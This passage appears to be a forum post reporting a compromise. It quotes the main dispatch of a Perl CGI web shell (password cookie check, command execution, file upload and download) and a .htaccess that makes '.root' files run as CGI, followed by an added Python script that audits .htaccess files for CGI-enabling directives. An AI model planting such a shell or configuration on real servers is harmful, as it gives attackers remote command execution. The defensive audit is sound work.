        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
    &PerformLogin;

}
elsif($Action eq "command") # user wants to run a command
{
    &ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
    &UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
    &DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
    &PerformLogout;
}

And there place .htaccess:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root

I hope there is some fix.

Thanks for your feedback.

Greetings remco

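A defender-side check for the .htaccess quoted in the post above, as an added example that is not part of the original message or of suPHP: it flags the directives in a per-directory file that switch on CGI execution, which is how a file with an arbitrary extension such as .root ends up being run as a script. The function names and the choice of Python are assumptions made for this example.

```python
import re

# Handler names and MIME types that make Apache execute a file as CGI.
CGI_HANDLERS = {"cgi-script"}
CGI_TYPES = {"application/x-httpd-cgi"}

def logical_lines(text):
    """Yield (lineno, line); comments dropped, backslash continuations joined."""
    buf, start = "", 0
    for n, raw in enumerate(text.splitlines(), 1):
        if not buf:
            start = n
        if raw.endswith("\\"):
            buf += raw[:-1] + " "
            continue
        line = (buf + raw).strip()
        buf = ""
        if line and not line.startswith("#"):
            yield start, line

def audit_htaccess(text):
    """Return (lineno, directive, detail) for each CGI-enabling directive."""
    findings = []
    for n, line in logical_lines(text):
        parts = line.split()
        name, args = parts[0].lower(), [a.strip('"').lower() for a in parts[1:]]
        if name == "options" and any(a.lstrip("+") == "execcgi" for a in args):
            findings.append((n, "Options", "ExecCGI enabled"))
        elif name == "addhandler" and args and args[0] in CGI_HANDLERS:
            findings.append((n, "AddHandler", "CGI for " + " ".join(args[1:])))
        elif name == "sethandler" and args and args[0] in CGI_HANDLERS:
            findings.append((n, "SetHandler", "CGI for every file"))
        elif name == "addtype" and args and args[0] in CGI_TYPES:
            findings.append((n, "AddType", "CGI type for " + " ".join(args[1:])))
    return findings

# The .htaccess quoted in the post above.
POSTED = """Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root
"""

if __name__ == "__main__":
    for lineno, directive, detail in audit_htaccess(POSTED):
        print(f"line {lineno}: {directive}: {detail}")
```

Run over every .htaccess under the virtual-host document roots, any finding in a directory that users can write to via FTP or an upload form deserves a look.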